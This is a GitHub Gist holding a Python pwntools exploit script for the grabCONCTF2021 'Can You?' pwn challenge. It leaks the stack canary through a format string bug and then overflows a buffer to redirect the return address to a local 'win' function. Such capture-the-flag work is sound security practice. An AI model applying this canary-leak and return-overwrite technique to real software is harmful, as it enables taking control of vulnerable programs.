Created
September 6, 2021 07:49
-
-
Save luckythandel/50032cbc08d5e65434208ff91c72c97e to your computer and use it in GitHub Desktop.
grabCONCTF2021 - pwn - `Can You?`
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.arch = 'i386' | |
| ''' | |
| we saw that there is a format string vulnerability. so, it is easy to get the stack cookie value and add it in a proper way to | |
| successfully over write the value of return pointer. | |
| ''' | |
| canary_format_str = "%31$p" # format string for canary. | |
| win = p32(0x08049236) # win function | |
| io = process('./cancancan') | |
| #canary | |
| io.recvline('can you bypass me???') | |
| io.sendline(canary_format_str.encode()) | |
| canary = eval(io.recv().decode().strip()) | |
| log.info("Canary: {}".format(hex(canary))) | |
| #ret overwrite | |
| offset = 116 # return pointer is at 116 bytes away from the input buffer. | |
| padding = b"A"*100 | |
| payload = padding+p32(canary) # add the stack canary in the payload to its proper position so that stack check may not failed. | |
| payload = payload+b"A"*(116-len(payload))+win | |
| io.sendline(payload) | |
| io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment